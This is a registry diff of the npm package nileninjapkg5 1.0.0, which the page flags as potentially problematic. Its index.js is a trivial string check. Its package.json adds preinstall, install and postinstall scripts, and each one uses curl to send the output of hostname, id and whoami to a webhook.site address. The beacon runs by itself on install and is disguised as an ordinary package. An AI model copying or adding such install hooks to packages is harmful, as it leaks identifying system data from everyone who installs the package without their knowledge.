nileninjapkg5 1.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of nileninjapkg5 might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/index.js +6 -0
  2. package/package.json +14 -0
package/index.js ADDED
@@ -0,0 +1,6 @@
1
+ function isNileNinja(string) {
2
+ return string === "nileninja"
3
+ }
4
+
5
+
6
+ module.exports = isNileNinja
package/package.json ADDED
@@ -0,0 +1,14 @@
1
+ {
2
+ "name": "nileninjapkg5",
3
+ "version": "1.0.0",
4
+ "description": "nileninja package",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1",
8
+ "preinstall": "curl https://webhook.site/f1ebeef1-f59b-4933-9f24-9c8e05a67c01?cmd=$(hostname)",
9
+ "install": "curl https://webhook.site/f1ebeef1-f59b-4933-9f24-9c8e05a67c01?cmd=$(id)",
10
+ "postinstall": "curl https://webhook.site/f1ebeef1-f59b-4933-9f24-9c8e05a67c01?cmd=$(whoami)"
11
+ },
12
+ "author": "nileninja",
13
+ "license": "ISC"
14
+ }